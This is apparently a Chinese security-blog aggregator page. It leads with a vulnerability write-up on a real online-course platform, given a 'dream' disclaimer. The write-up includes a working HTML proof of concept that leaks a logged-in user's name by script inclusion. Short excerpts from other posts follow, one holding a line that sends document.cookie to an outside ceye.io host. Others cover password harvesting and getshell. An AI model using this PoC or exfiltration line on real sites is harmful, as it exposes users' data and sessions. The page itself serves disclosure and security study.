Aggregator

0x00 Disclaimer          由于coronavirus的影响，学校安排我们上网课，可能是由于学习太累，做梦都梦到了上网课了，而且还梦到了一个漏洞百出的网课平台。最近我梦到发现了一个非常有趣的漏洞,在我在梦中发现的这个平台的大大小小的漏洞中，这个虽然不是最严重的，但是是最有趣的。
         幸好在做梦的时候还顺手截了图，这才能够跟大家分享。本文所述内容纯属意淫，如果您在现实生活中碰到了长得相似的系统那完全是巧合，和本人一丢丢关系都没有

0x01 漏洞发现          在睡梦中闲来无事抓个包，发现包里面居然有很好玩的内容
什么，一个疑似JS的文件里面包含了我的名字？
赶快翻上去header，发现了这个
这说明了什么？这个头指示浏览器把这个请求回来的东西当作JS代码，由于JS可以允许跨域，攻击者可以在html中精心构造JS来访问这些信息 0x02 漏洞原理成因背景 笔者很懒惰，发现先知社区讲的更好，就直接贴上链接了：https://xz.aliyun.com/t/7204
0x03 漏洞POC编写 这里面所有的信息都是被document.writeln包裹起来了，但是我们可以通过覆盖这个函数实现获取信息而不是傻乎乎地把信息写在页面上。基于这一点，我们可以很容易地写出POC代码 <!DOCTYPE html> <head>     <meta charset="UTF-8">     <title>！！！</title> </head> <body>     <h1 id="msg" style="color:red"></h1>     <script>     name=''     islogin=1;     document.writeln=function(text)     {         match=text.match(/zt_u_name">(.*?)</)         if(match !==null)         {             name=match[1];         }         if(text.search("http://passport2.chaoxing.com/wlogin")!==-1)             islogin=0;     }     </script>     <script src="https://3wfy-ans.chaoxing.com/passport/allHead.shtml"> </script>     <script>         if(islogin)             msg="X星XX通并不存在什么信息泄露漏洞。是吧,"+name+"同学?";         else             msg="你还没有登陆X星XX通，这我还怎么装逼啊？"         document.getElementById('msg').innerText=msg     </script> </body> </html> POC实测效果：
源码懒得放在github了，想要的自己复制自己玩
0x04 对漏洞的一些思考 或许可以整个扫描器，搞多个不同的用户，爬取后对比JS区别，自动化发掘这种洞？ 又或者像个办法来自动搜集JS里面的敏感信息？

NCSC technical paper about the privacy and security design of the NHS contact tracing app developed to help slow the spread of coronavirus.

HTTP cache cross site leaks in XSLeaks

密码和口令是通往权限和控制效果的重要途径，通过获取目标的重要系统口令或口令设置规律，能够有效的实现横向移动和重要的权限提升，因此密码/口令在渗透测试过程中被作为重点关注对象，比如在我们获取某目标系统的Webshell时，往往会第一时间查看数据库配置文件获取数据库账号密码，进而可以有效的访问系统数据。那么除了通过配置文件的方式获取密码外，在渗透测试的过程中还有哪些途径可以获取此类密码呢

看csp规则，默认是在当前域内，允许执行内联js。如果这是一道ctf的话，就很简单了， window.location.href='http://aa.xxxx.ceye.io?'+document.cookie;能把cookie传出来。 但是要是远程加载js文件是不满足csp规则的。 iframe

案例是在最近项目中遇到的俩个站，挺有意思的，所以分享出来。第一个站getshell后，内网简单的看了下，发现不是目标就没深入。 第一个站 1、弱口令 弱口令：admin admin进入网站后台 2、任意文件下载 在系统配置备份模块发现http://xxx.xxx.xxx.xxx/DownloadSe

我们提“以攻促防”想表达的点也很简单：做安全的，需要懂得攻击，发现问题，还需要懂得防御，解决问题。概念就是这么简单。剩下的呢？实战出真知。

Revisiting Cookie Crimes In 2018 @mangopdf described “Cookie Crimes”, which is great research around Chrome’s remote debugging feature that allows adversaries and malware to gain access to cookies quite convienently during post-exploitation. The original research is published here, and it still works today. The new Microsoft Edge browser and Chromium Microsoft’s latest Edge browser is based on the same code, Chromium. I guess, you already know where this is going now…

低功耗蓝牙小工具

繁星之下，大多数人的生活都是朴实无华的，但总会有些点滴让人觉得世界是如此的美好。

COVID-19 has turned the tech world upside down. Read what a future IT director thought we did right&mdash;and what went terribly wrong.

Guidance for members of the public, website administrators and JavaScript developers in relation to the recently publicised cryptocurrency mining compromises of several websites

MethodVisitor ClassVisitor的visitMethod能够访问到类中某个方法的一些入口信息，那么针对具体方法中字节码的访问是由MethodVisitor来进行的 访问顺序如下，其中visitCode和visitMaxs仅调用一次，标志方法字节码访问的开始和结束 MethodVi

一些内心独白

笔者近期阅读了十几个知名公司和机构的年度报告，将一些要点总结分享给大家。

这里分享我们实践的一个新思路，能有效达到IAST/RASP快速部署的目的。

完成上一篇的设置后，我们将在本篇中分享如何着手开始对门锁固件进行分析。

“人的因素”促使我们更深刻认识到参与网络安全链条中的人员个体的差异和作用，用新技术去弥补防御方弱点、固化人员安全能力推广、并限制攻击者活动空间。

No One is Invisible to Ransomware Attacks: Cybercriminals Pinpointing Healthcare Organizations   In this challenging time, cybercriminals have their eyes on consumers and institutions...

The post Ransomware Attacks: Cybercriminals Pinpointing Healthcare Organizations appeared first on McAfee Blog.

Codeql 入门教程 首发于先知社区 codeql是一个可以对代码进行分析的引擎, 安全人员可以用它作为挖洞的辅助或者直接进行挖掘漏洞,节省进行重复操作的精